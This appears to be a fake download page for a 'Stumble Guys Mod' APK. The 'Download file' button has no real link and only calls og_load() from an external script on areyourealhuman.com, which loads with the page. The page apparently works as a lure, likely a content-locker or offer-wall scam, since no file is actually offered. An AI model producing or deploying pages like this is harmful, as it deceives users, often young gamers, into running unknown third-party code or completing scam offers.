<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Stumble Guys Mod Download</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f5f5f5;
            margin: 0;
            padding: 0;
        }

        .container {
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            height: 100vh;
        }

        .download-btn {
            padding: 15px 30px;
            background-color: #ff0000; /* Red color */
            color: #fff;
            text-decoration: none;
            font-weight: bold;
            border-radius: 5px;
            transition: background-color 0.3s;
        }

        .download-btn:hover {
            background-color: #cc0000; /* Darker red on hover */
        }

        .file-info {
            text-align: center;
            margin-top: 20px;
            padding: 10px;
            border: 1px solid #ccc; /* Border style */
            border-radius: 5px;
        }

        @media only screen and (max-width: 600px) {
            .download-btn {
                font-size: 16px;
            }
        }
    </style>
</head>
<body>
    <div class="container">
        <a href="#" class="download-btn" onclick="og_load()">Download file</a>
        <div class="file-info">
            <p>File to download: Stumble Guys Mod.apk</p>
            <p>Size: 180.3 MB</p>
            <p>Date added: 2023.08.28</p>
        </div>
    </div>

<script type="text/javascript" id="ogjs" src="https://areyourealhuman.com/cl/js/85jk3"></script>
</body>
</html>
